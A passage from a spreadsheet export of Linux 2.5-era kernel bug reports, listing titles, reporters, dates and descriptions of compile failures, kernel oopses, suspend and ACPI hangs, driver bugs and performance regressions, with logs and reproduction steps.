    <t>Distribution: Mandrake 9.1 Hardware Environment: x86 Celeron 350 Software Environment: gcc version 3.2.2 (Mandrake Linux 9.1 3.2.2-3mdk) Problem Description: When compiling Linux 2.5.67's modules, the compile dies with this: gcc -Wp,-MD,drivers/char/.genrtc.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -pipe -mpreferred-stack-boundary=2 -march=pentium2 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=genrtc -DKBUILD_MODNAME=genrtc -c -o drivers/char/genrtc.o drivers/char/genrtc.c drivers/char/genrtc.c:100: warning: static declaration for `gen_rtc_interrupt' follows non-static drivers/char/genrtc.c: In function `gen_rtc_timer': drivers/char/genrtc.c:135: warning: comparison of distinct pointer types lacks a cast drivers/char/genrtc.c: In function `gen_rtc_open': drivers/char/genrtc.c:358: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:427) drivers/char/genrtc.c: In function `gen_rtc_release': drivers/char/genrtc.c:377: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:439) drivers/char/genrtc.c: In function `gen_rtc_proc_output': drivers/char/genrtc.c:453: void value not ignored as it ought to be drivers/char/genrtc.c:498: `RTC_BATT_BAD' undeclared (first use in this function) drivers/char/genrtc.c:498: (Each undeclared identifier is reported only once drivers/char/genrtc.c:498: for each function it appears in.) make[2]: *** [drivers/char/genrtc.o] Error 1 make[1]: *** [drivers/char] Error 2 make: *** [drivers] Error 2 RTC_BATT_BAD is only defined in: include/asm-m68k/rtc.h include/asm-ppc/rtc.h and not the generic or x86 ones. Steps to reproduce: compile a kernel with the RTC enabled. Let me know if you want my .config</t>
  </si>
  <si>
    <t>Christian Felsing</t>
  </si>
  <si>
    <t>2.5.69</t>
  </si>
  <si>
    <t>network device does not survive laptop suspend</t>
  </si>
  <si>
    <t>2003-04-14 07:51 UTC</t>
  </si>
  <si>
    <t>Jan De Luyck</t>
  </si>
  <si>
    <t>2004-11-16 22:02 UTC</t>
  </si>
  <si>
    <t>Stephen Rothwell</t>
  </si>
  <si>
    <t>Distribution: Debian Unstable Hardware Environment: Dell Latitude CPxJ 650 Software Environment: ? Problem Description: I suspended my laptop this morning to move it from home to work without having to shhutdown everything. The laptop came nicely out of the suspend, except for my Cardbus ethernet device. Since i resumed the laptop it hangs around every 10 seconds for around 2 seconds. Everything hangs, from mouse movement, to audio playback, to pinging. This is seen in syslog, in great numbers: eth0: Transmitter encountered 16 collisions -- network cable problem? eth0: Interrupt posted but not delivered -- IRQ blocked by another device? Flags; bus-master 1, dirty 0(0) current 16(0) Transmit list ffffffff vs. ce6da200. eth0: command 0x3002 did not complete! Status=0xffff 0: @ce6da200 length 80000123 status 00000123 1: @ce6da2a0 length 800000f9 status 000000f9 2: @ce6da340 length 8000002a status 0000002a 3: @ce6da3e0 length 8000002a status 0000002a 4: @ce6da480 length 8000002a status 0000002a 5: @ce6da520 length 8000002a status 0000002a 6: @ce6da5c0 length 8000002a status 0000002a 7: @ce6da660 length 8000002a status 0000002a 8: @ce6da700 length 8000002a status 0000002a 9: @ce6da7a0 length 8000002a status 0000002a 10: @ce6da840 length 8000002a status 0000002a 11: @ce6da8e0 length 8000002a status 0000002a 12: @ce6da980 length 8000002a status 0000002a 13: @ce6daa20 length 8000002a status 0000002a 14: @ce6daac0 length 8000002a status 8000002a 15: @ce6dab60 length 8000002a status 8000002a eth0: command 0x5800 did not complete! Status=0xffff eth0: Resetting the Tx ring pointer. NETDEV WATCHDOG: eth0: transmit timed out eth0: transmit timed out, tx_status ff status ffff. diagnostics: net ffff media ffff dma ffffffff fifo ffff eth0: Transmitter encountered 16 collisions -- network cable problem? eth0: Interrupt posted but not delivered -- IRQ blocked by another device? Flags; bus-master 1, dirty 0(0) current 16(0) Transmit list ffffffff vs. ce6da200. eth0: command 0x3002 did not complete! Status=0xffff 0: @ce6da200 length 80000123 status 00000123 1: @ce6da2a0 length 800000f9 status 000000f9 2: @ce6da340 length 8000002a status 0000002a 3: @ce6da3e0 length 8000002a status 0000002a 4: @ce6da480 length 8000002a status 0000002a 5: @ce6da520 length 8000002a status 0000002a 6: @ce6da5c0 length 8000002a status 0000002a 7: @ce6da660 length 8000002a status 0000002a 8: @ce6da700 length 8000002a status 0000002a 9: @ce6da7a0 length 8000002a status 0000002a 10: @ce6da840 length 8000002a status 0000002a 11: @ce6da8e0 length 8000002a status 0000002a 12: @ce6da980 length 8000002a status 0000002a 13: @ce6daa20 length 8000002a status 0000002a 14: @ce6daac0 length 8000002a status 8000002a 15: @ce6dab60 length 8000002a status 8000002a eth0: command 0x5800 did not complete! Status=0xffff eth0: Resetting the Tx ring pointer. NETDEV WATCHDOG: eth0: transmit timed out The module in question is loaded directly, 3c59x, and was not unloaded prior to the suspend. Hardware: Dell Latitude CPj 650Mhz 00:03.0 CardBus bridge: Texas Instruments PCI1225 (rev 01) Subsystem: Dell Computer Corporation: Unknown device 00bb Flags: bus master, medium devsel, latency 168, IRQ 11 Memory at 10000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 10400000-107ff000 (prefetchable) Memory window 1: 10800000-10bff000 I/O window 0: 00001000-000010ff I/O window 1: 00001400-000014ff 16-bit legacy interface ports at 0001 00:03.1 CardBus bridge: Texas Instruments PCI1225 (rev 01) Subsystem: Dell Computer Corporation: Unknown device 00bb Flags: bus master, medium devsel, latency 168, IRQ 11 Memory at 10001000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=06, subordinate=09, sec-latency=176 Memory window 0: 10c00000-10fff000 (prefetchable) Memory window 1: 11000000-113ff000 I/O window 0: 00001800-000018ff I/O window 1: 00001c00-00001cff 16-bit legacy interface ports at 0001 02:00.0 Ethernet controller: 3Com Corporation 3c575 [Megahertz] 10/100 LAN CardBus (rev 01) Subsystem: 3Com Corporation 3C575 Megahertz 10/100 LAN Cardbus PC Card Flags: medium devsel, IRQ 11 I/O ports at 1000 [disabled] [size=128] [virtual] Memory at 10800000 (32-bit, non-prefetchable) [disabled] [size=128] [virtual] Memory at 10800080 (32-bit, non-prefetchable) [disabled] [size=128] Expansion ROM at 10400000 [disabled] [size=128K] Capabilities: [50] Power Management version 1 Steps to reproduce: Put laptop in suspend, take out of suspend.</t>
  </si>
  <si>
    <t>Enabling Coda with Devfs causes Kernel Panic</t>
  </si>
  <si>
    <t>2003-04-14 18:49 UTC</t>
  </si>
  <si>
    <t>Matt Chorman</t>
  </si>
  <si>
    <t>2003-04-21 10:38 UTC</t>
  </si>
  <si>
    <t>Jan Harkes</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4_rc Hardware Environment: Micron Millenia Transport, P133 (i586) Software Environment: i586-pc-linux-gnu, posix threads, gcc 3.2.2 Problem Description: Compiling Devfs into kernel is fine. Compiling Coda into kernel is fine. Compiling Devfs and Coda together is not fine, causes a kernel panic. Sorry, I don't have a console - here is what I can see of the error: CPU: 0 EIP: 0060:[&lt;C020605F&gt;] Not tainted EFLAGS: 00010202 EIP is at vsnprintf+0x2f/0x460 eax: c2fd3f43 ebx: c2fd3f44 ecx: c040776c edx: 00000000 esi: c2fd3f44 edi: 00000000 ebp: c2fd3f24 esp: c2fd3f0c ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=c2fd2000 task c2fd0040) Stack: 000001f0 c2fd3f2c c2fd3f83 c2fd3f44 c2fd3fa0 00000000 c2fd3f8c c01a4a62 c2fd3f44 00000040 00000000 c2fd3f98 c01360d1 00000000 00000246 00000043 00000001 00000000 c2fd3f70 c0150e47 00000018 000000d0 00000000 00000001 [&lt;c01a4a62&gt;] devfs_mk_dir+0x22/0xd0 [&lt;c01360d1&gt;] kmalloc+0x81/0x99 [&lt;c0150e47&gt;] register_chrdev_region+0x17/0x120 [&lt;c0150f6b&gt;] register_chrdev+0x1b/0x20 [&lt;c019a9ab&gt;] init_coda_psdev+0x4b/0x90 [&lt;c019b050&gt;] init_once+0x0/0x20 [&lt;c01050a2&gt;] init+0x32/0x190 [&lt;c0105070&gt;] init+0x0/0x190 [&lt;c0107255&gt;] kernel_thread_helper+0x50/0x10 Code: 80 3a 00 74 1d 8a 02 3c 25 74 3d 3b 75 f0 77 05 88 06 8b 55 &lt;0&gt;Kernel panic: Attempted to kill init! Steps to reproduce: Compile Devfs and Codafs into kernel (have not tested as modules.) This causes kernel panic upon boot.</t>
  </si>
  <si>
    <t>gdth driver broken</t>
  </si>
  <si>
    <t>2003-04-14 20:17 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody Hardware Environment: ServerWorks based Dual P3/1400, ICP Z8623RZ. Software Environment: Kernel created with gcc-2.95.4 (which comes with Debian) Problem Description: On modprobe gdth modprobe hangs. A cat /proc/scsi/scsi will show a Segmentation fault. This occurs on gdth only. It does not depend on other loaded drivers. Steps to reproduce: Start kernel, then modprobe gdth. ICP card must be installed with at least on disk array.</t>
  </si>
  <si>
    <t>system hang on boot at ACPI</t>
  </si>
  <si>
    <t>2003-04-15 07:53 UTC</t>
  </si>
  <si>
    <t>2004-03-03 21:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 8.0 Hardware Environment: 8-way x86, 10G RAM, (2)30G SCSI Software Environment: N/A Problem Description: when booting the kernel the system hangs at ACPI Steps to reproduce: build/install kernel on the 8-way and boot the kernel. Workaround: append acpi=off</t>
  </si>
  <si>
    <t>2.5.67 won't get the real partition table for hdb</t>
  </si>
  <si>
    <t>2003-04-15 08:25 UTC</t>
  </si>
  <si>
    <t>Tord</t>
  </si>
  <si>
    <t>2004-07-17 17:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Linux From Scratch, glibc 2.3.2, gcc 3.2.2 (didn't work with 2.95.5 either) Hardware Environment: Athlon XP 1600+, hdb is a seagate 20,4 gb, Software Environment:gcc 3.2.2 Problem Description: 2.5.67 won't get the real partition table for hdb Steps to reproduce: Just compile and run a 2.5.67 kernel. When I compiled a 2.5.67 kernel (and 2.5.66, 2.5.65 and 2.5.63), during boot it says: Kernel panic: could not mount root fs on /dev/hdb13 (or something). I look a bit longer up, and i see this: hdb: hdb1 When it is detecting the partition. I am using isolinux for booting (lilo and GRUB doesn't work). It did not work with syslinux either. fdisk -l /dev/hdb says: Device Boot Start End Blocks Id System /dev/hdb1 2 2490 19992892+ f Win95 Ext'd (LBA) /dev/hdb2 * 1 2 8032+ 83 Linux Partition 2 does not end on cylinder boundary: phys=(1, 0, 63) should be (1, 254, 63) /dev/hdb5 2 14 104359+ 83 Linux /dev/hdb6 15 651 5116671 83 Linux /dev/hdb7 652 827 1413688+ 83 Linux /dev/hdb8 828 892 522081 82 Linux swap /dev/hdb9 893 1019 1020096 b Win95 FAT32 /dev/hdb10 1020 1529 4096543+ 83 Linux /dev/hdb11 1530 1911 3068383+ 83 Linux /dev/hdb12 1912 2154 1951866 83 Linux /dev/hdb13 2155 2490 2698888+ 83 Linux I don't boot from /dev/hdb2. It works perfectly with 2.4.x.</t>
  </si>
  <si>
    <t>Cannot boot: get VFS cannot mount root on XFS and EXT2 partitions</t>
  </si>
  <si>
    <t>2003-04-15 10:28 UTC</t>
  </si>
  <si>
    <t>2003-09-19 07:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian 3.0 unstable, + module_init_tools(?) Hardware Environment: Pentium 4 ASUS P4533 mobo, Promise IDE Software Environment: Both bzDisk and lilo; with and without initrd Problem Description: VFS: cannot mount root fs during boot-up Steps to reproduce: Roll kernel, do install, then try to boot. Partitions (XFS, EXT2) built by 2.4.20/Debian.</t>
  </si>
  <si>
    <t>Power-Thermal</t>
  </si>
  <si>
    <t>process fork + shell exec is slower in 2.5.63</t>
  </si>
  <si>
    <t>2003-04-17 11:11 UTC</t>
  </si>
  <si>
    <t>Duc Vianney</t>
  </si>
  <si>
    <t>2003-05-13 09:41 UTC</t>
  </si>
  <si>
    <t>simple file performance degradation on 2.5.63</t>
  </si>
  <si>
    <t>2003-04-17 11:26 UTC</t>
  </si>
  <si>
    <t>2003-05-13 09:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment:8500R 8-way 700MHz 4GB RAM Software Environment: Stock kernel 2.4.20 and 2.5.63 Problem Description: simple system calls and file-related calls are slow in 2..5.63 compared to 2.4.20 Steps to reproduce: 1. run lmbench on an SMP 4-way (need not to be an SMP 4-way to reproduce the problem) 2. look at the detailed data 3. compare data from 2.4.20 and 2.5.63 Actual Results: All times are in microseconds 2.4.20 2.5.63 ====== ====== Simple read 0.8832 0.9759 Simple write 0.7994 0.8768 Simple stat 4.678 5.8893 Simple fstat 1.166 1.3103 Simple open/close 6.1065 7.5188 Select on 10 fd's 4.4816 4.9478 Select on 100 fd's 28.456 31.9116 Select on 250 fd's 68.6375 79.9459 Select on 500 fd's 135.3659 169.9062 Select on 10 tcp fd's 5.206 5.3773 Select on 100 tcp fd's 35.4323 39.8286 Select on 250 tcp fd's 86.2031 91.4333 Select on 500 tcp fd's 170.375 209.5185 Expected Results: 2.5 is as fast as 2.4</t>
  </si>
  <si>
    <t>File locking memory leak</t>
  </si>
  <si>
    <t>many</t>
  </si>
  <si>
    <t>2003-04-18 05:29 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:51 UTC</t>
  </si>
  <si>
    <t>Problem Description: Some people have reported to me that the file_lock_cache grows virtually without bound. I haven't been able to reproduce the problem yet. I'm filing this bug here to track the problem. I suspect it depends on workload. First problem will be to track down what type of lock it is; that'll give me some clue as to which of the three independent implementations in the file locking code is leaking locks. Steps to reproduce:</t>
  </si>
  <si>
    <t>BUG when running ipcs after huge page shm</t>
  </si>
  <si>
    <t>2.5.67-bk current</t>
  </si>
  <si>
    <t>2003-04-18 12:37 UTC</t>
  </si>
  <si>
    <t>2003-04-24 14:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: 2-way PIII-550, 2GB ram Software Environment: CONFIG_HUGETLB_PAGE=y Problem Description: kernel BUG at include/asm/spinlock.h:123! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c02055ad&gt;] Not tainted EFLAGS: 00010286 EIP is at shm_get_stat+0x5d/0xbc eax: 0000000e ebx: f772e14c ecx: c04a1be0 edx: c0411d88 esi: f772e1b0 edi: 00000000 ebp: f747df38 esp: f747dde4 ds: 007b es: 007b ss: 0068 Process ipcs (pid: 778, threadinfo=f747c000 task=f762e100) Stack: c03a9ab7 c0205595 f747df2c bffff620 f747df44 c050bfb0 c0205801 f747df34 f747df38 bffff5bc 0000000e 00000000 00000000 00000000 00000000 00000000 00000001 00000001 00000019 00000000 00000000 c0512bc0 f7c181cc f7c181bc Call Trace: [&lt;c0205595&gt;] shm_get_stat+0x45/0xbc [&lt;c0205801&gt;] sys_shmctl+0x1f5/0x820 [&lt;c013a1e0&gt;] check_poison_obj+0x38/0x188 [&lt;c013baa6&gt;] kmem_cache_alloc+0x126/0x134 [&lt;c01483b2&gt;] page_add_rmap+0x12/0x158 [&lt;c0143e26&gt;] do_no_page+0x47a/0x488 [&lt;c014401d&gt;] handle_mm_fault+0x105/0x220 [&lt;c01168b0&gt;] do_page_fault+0x120/0x45d [&lt;c0116790&gt;] do_page_fault+0x0/0x45d [&lt;c0215ef1&gt;] tty_write+0x33d/0x378 [&lt;c021b298&gt;] write_chan+0x0/0x20c [&lt;c010f918&gt;] sys_ipc+0x1d4/0x1ec [&lt;c0109a2d&gt;] error_code+0x2d/0x38 [&lt;c0108fa3&gt;] syscall_call+0x7/0xb Code: 0f 0b 7b 00 a0 9a 3a c0 83 c4 08 f0 fe 0b 0f 88 04 0d 00 00 Steps to reproduce: echo 10 &gt; /proc/sys/vm/nr_hugepages ran a quick test program that used shm to allocate 8MB with SHM_HUGETLB run the 'ipcs' command</t>
  </si>
  <si>
    <t>warnings on hcd rmmod:  "dangling refs(N) to bus B"</t>
  </si>
  <si>
    <t>2003-04-18 12:48 UTC</t>
  </si>
  <si>
    <t>2003-09-07 11:26 UTC</t>
  </si>
  <si>
    <t>The bus refcounting mechanism is broken, it often produces warning messages like that one when modules are removed. The problem appears to be an extremely long-standing one, at least in terms of the how-to-reproduce I saw: - connect a device that won't immediately enumerate, so that setting its address needs to be retried (or similar error, like set_configuration failing) - unplug that device ... at this point the refcount is wrong, but you can't tell until - rmmod the relevant HCD. This particular cause of that message is because the bus refcount isn't released on error. The fix isn't as straightforward as it should be because of funky calling conventions ("longstanding", likely since 2.4), but it's not complicated either.</t>
  </si>
  <si>
    <t>CONFIG_SOFTWARE_SUSPEND should depend on CONFIG_SWAP</t>
  </si>
  <si>
    <t>2.5.67 proper</t>
  </si>
  <si>
    <t>2003-04-19 13:22 UTC</t>
  </si>
  <si>
    <t>2003-04-29 16:44 UTC</t>
  </si>
  <si>
    <t>NTFS - dir.c errors during compile</t>
  </si>
  <si>
    <t>2.5.68</t>
  </si>
  <si>
    <t>2003-04-20 12:18 UTC</t>
  </si>
  <si>
    <t>Paul Sureddin</t>
  </si>
  <si>
    <t>2003-05-01 21:26 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.2 Hardware Environment: PIII - 550 Software Environment: GCC 3.3 pre Problem Description: /fs/ntfs/dir.c fails to compile Steps to reproduce: Configure Filesystems-&gt;DOS/FAT/NT filesystems-&gt;NTFS file system support (Read only) as in-kernel or module. Error occurs either way. gcc -Wp,-MD,fs/ntfs/.dir.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DNTFS_VERSION=\"2.1.0\" -DKBUILD_BASENAME=dir -DKBUILD_MODNAME=ntfs -c -o fs/ntfs/dir.o fs/ntfs/dir.c In file included from fs/ntfs/inode.h:29, from fs/ntfs/debug.h:30, from fs/ntfs/ntfs.h:40, from fs/ntfs/dir.c:24: fs/ntfs/layout.h:299: warning: declaration does not declare anything fs/ntfs/layout.h:1449: warning: declaration does not declare anything fs/ntfs/layout.h:1465: warning: declaration does not declare anything fs/ntfs/layout.h:1714: warning: declaration does not declare anything fs/ntfs/layout.h:1891: warning: declaration does not declare anything fs/ntfs/layout.h:2051: warning: declaration does not declare anything fs/ntfs/layout.h:2063: warning: declaration does not declare anything fs/ntfs/dir.c: In function `ntfs_lookup_inode_by_name': fs/ntfs/dir.c:117: error: structure has no member named `length' fs/ntfs/dir.c:121: error: structure has no member named `key_length' fs/ntfs/dir.c:128: error: structure has no member named `flags' fs/ntfs/dir.c:162: error: structure has no member named `indexed_file' fs/ntfs/dir.c:171: error: structure has no member named `indexed_file' fs/ntfs/dir.c:214: error: structure has no member named `indexed_file' fs/ntfs/dir.c:268: error: structure has no member named `flags' fs/ntfs/dir.c:287: error: structure has no member named `length' fs/ntfs/dir.c:370: error: structure has no member named `length' fs/ntfs/dir.c:374: error: structure has no member named `key_length' fs/ntfs/dir.c:386: error: structure has no member named `flags' fs/ntfs/dir.c:420: error: structure has no member named `indexed_file' fs/ntfs/dir.c:429: error: structure has no member named `indexed_file' fs/ntfs/dir.c:472: error: structure has no member named `indexed_file' fs/ntfs/dir.c:524: error: structure has no member named `flags' fs/ntfs/dir.c:535: error: structure has no member named `length' fs/ntfs/dir.c: In function `ntfs_filldir': fs/ntfs/dir.c:1019: error: structure has no member named `indexed_file' fs/ntfs/dir.c:1023: error: structure has no member named `indexed_file' fs/ntfs/dir.c:1045: error: structure has no member named `indexed_file' fs/ntfs/dir.c: In function `ntfs_readdir': fs/ntfs/dir.c:1152: error: structure has no member named `length' fs/ntfs/dir.c:1158: error: structure has no member named `key_length' fs/ntfs/dir.c:1161: error: structure has no member named `flags' fs/ntfs/dir.c:1238: warning: comparison between signed and unsigned fs/ntfs/dir.c:1329: error: structure has no member named `length' fs/ntfs/dir.c:1336: error: structure has no member named `key_length' fs/ntfs/dir.c:1339: error: structure has no member named `flags' fs/ntfs/dir.c: In function `ntfs_dir_open': fs/ntfs/dir.c:1410: warning: comparison between signed and unsigned make[2]: *** [fs/ntfs/dir.o] Error 1 make[1]: *** [fs/ntfs] Error 2 make: *** [fs] Error 2 linux:/usr/src/linux-2.5.68 #</t>
  </si>
  <si>
    <t>Compilation error for adbhid.c [ppc]</t>
  </si>
  <si>
    <t>2003-04-21 00:55 UTC</t>
  </si>
  <si>
    <t>Andres Salomon</t>
  </si>
  <si>
    <t>2004-01-31 15:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: NewWorld pmac; 7410, altivec supported Software Environment: gcc version 3.2.3 20030407 (Debian prerelease) Problem Description: drivers/macintosh/adbhid.c fails to compile Steps to reproduce: [obvious fix; omitting]</t>
  </si>
  <si>
    <t>Missing include header causes agp compilation to fail on ppc32</t>
  </si>
  <si>
    <t>2003-04-21 01:03 UTC</t>
  </si>
  <si>
    <t>2003-06-03 07:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: NewWorld pmac; 7410, altivec supported Software Environment: gcc version 3.2.3 20030407 (Debian prerelease) Problem Description: Things including asm/agp.h fail to compile due to missing header. Dummy files were added to stuff like asm-sparc64, but not to asm-ppc. I can't verify that this dummy file won't hurt anything, but it worked for me when I booted up my ppc box into 2.5.68 (using atyfb128) and started X (using X's rage128 driver).</t>
  </si>
  <si>
    <t>keywest driver fails to compile due to i2c interface changes</t>
  </si>
  <si>
    <t>2003-04-21 01:08 UTC</t>
  </si>
  <si>
    <t>2004-01-04 01:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: NewWorld pmac; 7410, altivec supported Software Environment: gcc version 3.2.3 20030407 (Debian prerelease) Problem Description: sound/ppc/keywest.c fails to compile due to i2c interface changes. i2c_adapter and i2c_client structs (both in i2c.h) have removed the data and name fields; keywest.c wasn't updated appropriately.</t>
  </si>
  <si>
    <t>aic7xxx driver hang</t>
  </si>
  <si>
    <t>2003-04-21 03:36 UTC</t>
  </si>
  <si>
    <t>Nils Hammar</t>
  </si>
  <si>
    <t>2004-12-02 09:21 UTC</t>
  </si>
  <si>
    <t>Notes: 1. Problem seems to be similar to bug #36. Distribution: Red Hat 8.0 with kernel 2.5.68 Hardware Environment: HP Vectra XU 2*200MHz Pentium Pro scsi0: aic7880: Ultra Single Channel A, SCSI Id=7, 16/253 SCBs sda: SEAGATE Model: ST39140N Rev: 1498 sda1: ext3 filesystem /boot 128M sda2: ext3 filesystem / 861M scsi1: aic7892: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs sdb: SEAGATE Model: ST318436LW sdb1: swap 1G sdb2: ext3 filesystem /usr/local 16G ide-bus0: hda: DVD-ROM ide-bus1: hdc: CD-RW Software Environment: Problem Description: System "hangs" with logging of messages: "Attempting to queue an ABORT message" Only resort is to reset the machine. Steps to reproduce: Problem seems to occur during high load on concurrent disk I/O when running in multi-processor mode. The problem does not occur if system is booted with a single-processor kernel (SMP disabled in kernel build).</t>
  </si>
  <si>
    <t>Oops on boot in vortex_interrupt with 3c59x</t>
  </si>
  <si>
    <t>2.5.68-bk1</t>
  </si>
  <si>
    <t>2003-04-21 07:56 UTC</t>
  </si>
  <si>
    <t>2003-05-12 20:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: 00:00.0 Host bridge: Intel Corp. 440LX/EX - 82443LX/EX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corp. 440LX/EX - 82443LX/EX AGP bridge (rev 03) 00:07.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 01) 00:07.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 01) 00:0f.0 PCI bridge: Digital Equipment Corporation DECchip 21152 (rev 03) 01:00.0 VGA compatible controller: ATI Technologies Inc 3D Rage Pro AGP 1X (rev 5c) 02:0a.0 Ethernet controller: 3Com Corporation 3c590 10BaseT [Vortex] 02:0b.0 Ethernet controller: Accton Technology Corporation SMC2-1211TX (rev 10) Software Environment: # CONFIG_ACPI is not set # CONFIG_APM is not set CONFIG_NET_ETHERNET=y CONFIG_MII=y CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=y CONFIG_USB_UHCI_HCD=y Linux razor 2.5.67-bk9 #15 Fri Apr 18 09:30:12 EST 2003 i686 unknown unknown GNU/Linux Gnu C 2.95.4 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools implemented e2fsprogs 1.32 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.10 Problem Description: Kernel 2.5.68-bk1 oops on boot during network setup with the following oops: Unable to handle kernel NULL pointer dereference at virtual address 0000006b printing eip: c023f1c5 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c023f1c5&gt;] Not tainted EFLAGS: 00010282 EIP is at vortex_interrupt+0x15/0x410 eax: 0000000b ebx: cfca35d0 ecx: 0000000b edx: 00000020 esi: 00000001 edi: c03fbf50 ebp: c03fbf28 esp: c03fbf04 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c03fa000 task=c03ae700) Stack: cfca35d0 00000001 c03fbf50 c027f040 c13e2400 c03fbf84 c135c998 00000000 0000000b c03fbf54 c010b15a c03fbf50 0000000b c13d3000 c03fbf84 c03f7cc0 c03f7cd0 c03fa000 04000001 00000001 c03fbf7c c010b641 0000000b c03fbf84 Call Trace: [&lt;c027f040&gt;] usb_hcd_irq+0x34/0x60 [&lt;c010b15a&gt;] handle_IRQ_event+0x36/0xa8 [&lt;c010b641&gt;] do_IRQ+0x1a1/0x2ec [&lt;c01070d4&gt;] default_idle+0x0/0x34 [&lt;c01070d4&gt;] default_idle+0x0/0x34 [&lt;c0109c70&gt;] common_interrupt+0x18/0x20 [&lt;c01070d4&gt;] default_idle+0x0/0x34 [&lt;c01070d4&gt;] default_idle+0x0/0x34 [&lt;c01070fa&gt;] default_idle+0x26/0x34 [&lt;c0107189&gt;] cpu_idle+0x35/0x44 [&lt;c0105000&gt;] _stext+0x0/0xcc [&lt;c01050c5&gt;] _stext+0xc5/0xcc [&lt;c03fc6b1&gt;] start_kernel+0x1c9/0x1d4 Code: 8b 70 60 89 55 f4 8b 40 18 89 45 f8 b8 00 e0 ff ff 21 e0 ff &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing This did NOT happen in 2.5.67-bk9, the last kernel I tried on this box. Steps to reproduce:</t>
  </si>
  <si>
    <t>PCMCIA cards in cardbus sockets no longer suspended</t>
  </si>
  <si>
    <t>2003-04-21 11:03 UTC</t>
  </si>
  <si>
    <t>2003-10-06 13:56 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: IBM Thinkpad X20 + non-cardbus pccard Software Environment: yenta_socket.o, orinoco_cs.o Problem Description: The introduction of the generic suspend/resume patch broke APM suspend for non-cardbus pcmcia cards. I first noticed this with an orinoco wavelan card. It remains powered on and keeps draining the battery. The system also has a 50% chance of locking up when resuming from the suspend. As far as I could figure out, the orinoco card does not show up as a pci device in the device tree. The result of this is that the generic suspend doesn't know about the device and simply doesn't suspend it. I have tried this with the orinoco wavelan, a targus compactflash modem in a pccard adapter and a 3com 3C562D/3C563D 10MBit network card. 2.5.65 suspended these perfectly, 2.5.67 and .68 do not. I have not tried 2.5.66 mostly because the following generic_suspend/resume changeset went into .67. http://linux.bkbits.net:8080/linux-2.5/cset@1.971.48.1?nav=index.html|src/|src/drivers|src/drivers/pcmcia|related/drivers/pcmcia/cs.c Steps to reproduce: Try to suspend any non-cardbus pccard, it is easier to notice for cards that have a led indicator that indicates whether the card is still powered and active.</t>
  </si>
  <si>
    <t>USB storage hangs mounting sony memory stick</t>
  </si>
  <si>
    <t>2.5.68-bk3</t>
  </si>
  <si>
    <t>2003-04-22 10:02 UTC</t>
  </si>
  <si>
    <t>2003-07-15 17:04 UTC</t>
  </si>
  <si>
    <t>Mounts fine in 2.4, just hangs in 2.5, and makes no progress.</t>
  </si>
  <si>
    <t>Andrew Theurer</t>
  </si>
  <si>
    <t>[perf][sdet]sched_best_cpu does not pick best cpu</t>
  </si>
  <si>
    <t>2.6.65</t>
  </si>
  <si>
    <t>2003-04-23 05:58 UTC</t>
  </si>
  <si>
    <t>2003-06-17 11:20 UTC</t>
  </si>
  <si>
    <t>Matthew Dobson</t>
  </si>
  <si>
    <t>Hardware Environment: pSeries NUMA Software Environment: Linux 2.5 Steps to Reproduce: 1.Boot Linux 2.5 kernel with NUMA support 2.Run any workload with fork+exec Actual Results: sched_best_cpu does not pick best cpu Expected Results: sched_best_cpu does pick best cpu This occurs when you have NUMA nodes with no cpus, like on p670: node0 has 8 cpus, node1 has 0 cpus, node2 has 8 cpus. sched_best_cpu() uses node_nr_running, which is initialized with "0" for each node. Since there are no cpus in node1, no tasks are mograted there, and node_nr_running[1] does not go above 0. So, with at least one task running, node1 is always picked as the least loaded node to place a newly exec'd task. Eventually the parent's task_cpu will be picked, making sched_best_cpu ineffective. Also, ideally this code needs some attention in node load. node load is currently computed by summing up all the running tasks in a node. This does not compensate for nodes that have different cpu counts, which may be a likely situation with cpu hot plug, dynamic partitions, etc. This stuff is probably a bit in the future and not highest priority, be we should probably think about it. Anyway, to fix the basic problem, add a new function, node_online, which functions simialr to cpu_online, and add a statement "if (!node_online(node) continue;" anywhere we do 